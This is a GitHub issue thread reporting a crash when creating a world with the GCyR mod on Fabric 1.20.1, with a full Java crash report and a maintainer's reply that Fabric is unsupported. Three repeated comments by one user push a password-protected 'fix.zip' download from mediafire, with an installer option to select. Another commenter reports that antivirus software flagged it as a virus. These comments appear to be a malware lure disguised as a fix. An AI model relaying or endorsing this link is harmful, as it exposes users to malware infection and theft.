### ISSUE TITLE
[Fabric 1.20.1] Crash when creating world

### ISSUE THREAD

**Issue by BlasterM5** [Argent-Matter/gcys#45]
### Checked for existing issues

- [X] I have checked for existing issues, and have found none.

### Tested latest version

- [X] I have checked that this occurs on the latest version.

### GregTech CEu Version

GCyR 1.20.1-0.1.3-aa-fabric

### Recipe Viewer Installed

None

### Environment

Single Player

### Cross-Mod Interaction

No

### Other Installed Mods

NONE - Tested on a completely clean profile, installing only what is required to run this mod

### Expected Behavior

Being able to create a new single player world

### Actual Behavior

Crashes to Desktop

### Steps to Reproduce

1: Install Fabric 1.20.1
2: Install GregTech CEu Modern
3: Install this mod
4: Start the game
5: Click Single Player
6: Watch it crash and be sad

### Additional Information

The Crash report:

---- Minecraft Crash Report ----
// My bad.

Time: 2024-08-28 02:53:02
Description: mouseClicked event handler

java.lang.NullPointerException: Cannot invoke "com.gregtechceu.gtceu.api.machine.MachineDefinition.asStack()" because "com.gregtechceu.gtceu.common.data.GTMachines.HULL[10]" is null
	at argent_matter.gcyr.data.recipe.MiscRecipes.init(MiscRecipes.java:93)
	at argent_matter.gcyr.common.data.GCyRRecipes.init(GCyRRecipes.java:15)
	at argent_matter.gcyr.GCyRGTAddon.addRecipes(GCyRGTAddon.java:107)
	at com.gregtechceu.gtceu.common.data.GTRecipes.lambda$recipeAddition$0(GTRecipes.java:73)
	at java.base/java.util.ArrayList.forEach(Unknown Source)
	at com.gregtechceu.gtceu.common.data.GTRecipes.recipeAddition(GTRecipes.java:73)
	at com.gregtechceu.gtceu.core.MixinHelpers.addDynamicDataPack(MixinHelpers.java:92)
	at net.minecraft.class_7237$class_7238.modify$znk001$gtceu$injectDynamicData(class_7237.java:517)
	at net.minecraft.class_7237$class_7238.method_42099(class_7237.java:104)
	at net.minecraft.class_7237.method_42098(class_7237.java:29)
	at net.minecraft.class_525.method_31130(class_525.java:333)
	at net.minecraft.class_528.method_43462(class_528.java:169)
	at net.minecraft.class_528.<init>(class_528.java:95)
	at net.minecraft.class_526.method_25426(class_526.java:54)
	at net.minecraft.class_437.method_25423(class_437.java:297)
	at net.minecraft.class_310.method_1507(class_310.java:1080)
	at net.minecraft.class_442.method_19861(class_442.java:159)
	at net.minecraft.class_4185.method_25306(class_4185.java:94)
	at net.minecraft.class_4264.method_25348(class_4264.java:56)
	at net.minecraft.class_339.method_25402(class_339.java:189)
	at net.minecraft.class_4069.method_25402(class_4069.java:38)
	at net.minecraft.class_442.method_25402(class_442.java:299)
	at net.minecraft.class_312.method_1611(class_312.java:98)
	at net.minecraft.class_437.method_25412(class_437.java:409)
	at net.minecraft.class_312.method_1601(class_312.java:98)
	at net.minecraft.class_312.method_22686(class_312.java:169)
	at net.minecraft.class_1255.execute(class_1255.java:102)
	at net.minecraft.class_312.method_22684(class_312.java:169)
	at org.lwjgl.glfw.GLFWMouseButtonCallbackI.callback(GLFWMouseButtonCallbackI.java:43)
	at org.lwjgl.system.JNI.invokeV(Native Method)
	at org.lwjgl.glfw.GLFW.glfwWaitEventsTimeout(GLFW.java:3474)
	at com.mojang.blaze3d.systems.RenderSystem.limitDisplayFPS(RenderSystem.java:237)
	at net.minecraft.class_310.method_1523(class_310.java:1244)
	at net.minecraft.class_310.method_1514(class_310.java:802)
	at net.minecraft.client.main.Main.main(Main.java:250)
	at net.fabricmc.loader.impl.game.minecraft.MinecraftGameProvider.launch(MinecraftGameProvider.java:480)
	at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:74)
	at net.fabricmc.loader.impl.launch.knot.KnotClient.main(KnotClient.java:23)

A detailed walkthrough of the error, its code path and all known details is as follows:
---------------------------------------------------------------------------------------

-- Head --
Thread: Render thread
Stacktrace:
	at argent_matter.gcyr.data.recipe.MiscRecipes.init(MiscRecipes.java:93)
	at argent_matter.gcyr.common.data.GCyRRecipes.init(GCyRRecipes.java:15)
	at argent_matter.gcyr.GCyRGTAddon.addRecipes(GCyRGTAddon.java:107)
	at com.gregtechceu.gtceu.common.data.GTRecipes.lambda$recipeAddition$0(GTRecipes.java:73)
	at java.base/java.util.ArrayList.forEach(Unknown Source)
	at com.gregtechceu.gtceu.common.data.GTRecipes.recipeAddition(GTRecipes.java:73)
	at com.gregtechceu.gtceu.core.MixinHelpers.addDynamicDataPack(MixinHelpers.java:92)
	at net.minecraft.class_7237$class_7238.modify$znk001$gtceu$injectDynamicData(class_7237.java:517)
	at net.minecraft.class_7237$class_7238.method_42099(class_7237.java:104)
	at net.minecraft.class_7237.method_42098(class_7237.java:29)
	at net.minecraft.class_525.method_31130(class_525.java:333)
	at net.minecraft.class_528.method_43462(class_528.java:169)
	at net.minecraft.class_528.<init>(class_528.java:95)
	at net.minecraft.class_526.method_25426(class_526.java:54)
	at net.minecraft.class_437.method_25423(class_437.java:297)
	at net.minecraft.class_310.method_1507(class_310.java:1080)
	at net.minecraft.class_442.method_19861(class_442.java:159)
	at net.minecraft.class_4185.method_25306(class_4185.java:94)
	at net.minecraft.class_4264.method_25348(class_4264.java:56)
	at net.minecraft.class_339.method_25402(class_339.java:189)
	at net.minecraft.class_4069.method_25402(class_4069.java:38)
	at net.minecraft.class_442.method_25402(class_442.java:299)
	at net.minecraft.class_312.method_1611(class_312.java:98)
	at net.minecraft.class_437.method_25412(class_437.java:409)
	at net.minecraft.class_312.method_1601(class_312.java:98)
	at net.minecraft.class_312.method_22686(class_312.java:169)
	at net.minecraft.class_1255.execute(class_1255.java:102)
	at net.minecraft.class_312.method_22684(class_312.java:169)
	at org.lwjgl.glfw.GLFWMouseButtonCallbackI.callback(GLFWMouseButtonCallbackI.java:43)
	at org.lwjgl.system.JNI.invokeV(Native Method)
	at org.lwjgl.glfw.GLFW.glfwWaitEventsTimeout(GLFW.java:3474)

-- Affected screen --
Details:
	Screen name: net.minecraft.class_442
Stacktrace:
	at net.minecraft.class_437.method_25412(class_437.java:409)
	at net.minecraft.class_312.method_1601(class_312.java:98)
	at net.minecraft.class_312.method_22686(class_312.java:169)
	at net.minecraft.class_1255.execute(class_1255.java:102)
	at net.minecraft.class_312.method_22684(class_312.java:169)
	at org.lwjgl.glfw.GLFWMouseButtonCallbackI.callback(GLFWMouseButtonCallbackI.java:43)
	at org.lwjgl.system.JNI.invokeV(Native Method)
	at org.lwjgl.glfw.GLFW.glfwWaitEventsTimeout(GLFW.java:3474)
	at com.mojang.blaze3d.systems.RenderSystem.limitDisplayFPS(RenderSystem.java:237)
	at net.minecraft.class_310.method_1523(class_310.java:1244)
	at net.minecraft.class_310.method_1514(class_310.java:802)
	at net.minecraft.client.main.Main.main(Main.java:250)
	at net.fabricmc.loader.impl.game.minecraft.MinecraftGameProvider.launch(MinecraftGameProvider.java:480)
	at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:74)
	at net.fabricmc.loader.impl.launch.knot.KnotClient.main(KnotClient.java:23)

-- Last reload --
Details:
	Reload number: 1
	Reload reason: initial
	Finished: Yes
	Packs: vanilla, fabric, gtceu:dynamic_assets
Stacktrace:
	at net.minecraft.class_6360.method_36565(class_6360.java:49)
	at net.minecraft.class_310.method_1587(class_310.java:2413)
	at net.minecraft.class_310.method_1514(class_310.java:821)
	at net.minecraft.client.main.Main.main(Main.java:250)
	at net.fabricmc.loader.impl.game.minecraft.MinecraftGameProvider.launch(MinecraftGameProvider.java:480)
	at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:74)
	at net.fabricmc.loader.impl.launch.knot.KnotClient.main(KnotClient.java:23)

-- System Details --
Details:
	Minecraft Version: 1.20.1
	Minecraft Version ID: 1.20.1
	Operating System: Windows 11 (amd64) version 10.0
	Java Version: 17.0.9, Azul Systems, Inc.
	Java VM Version: OpenJDK 64-Bit Server VM (mixed mode, sharing), Azul Systems, Inc.
	
	...

**Comment by zVoltaic** [comment]
fabric versions of the mod are no longer supported

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zVoltaic** [comment]
both my antiviruses picked that up as a virus. dont download it

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
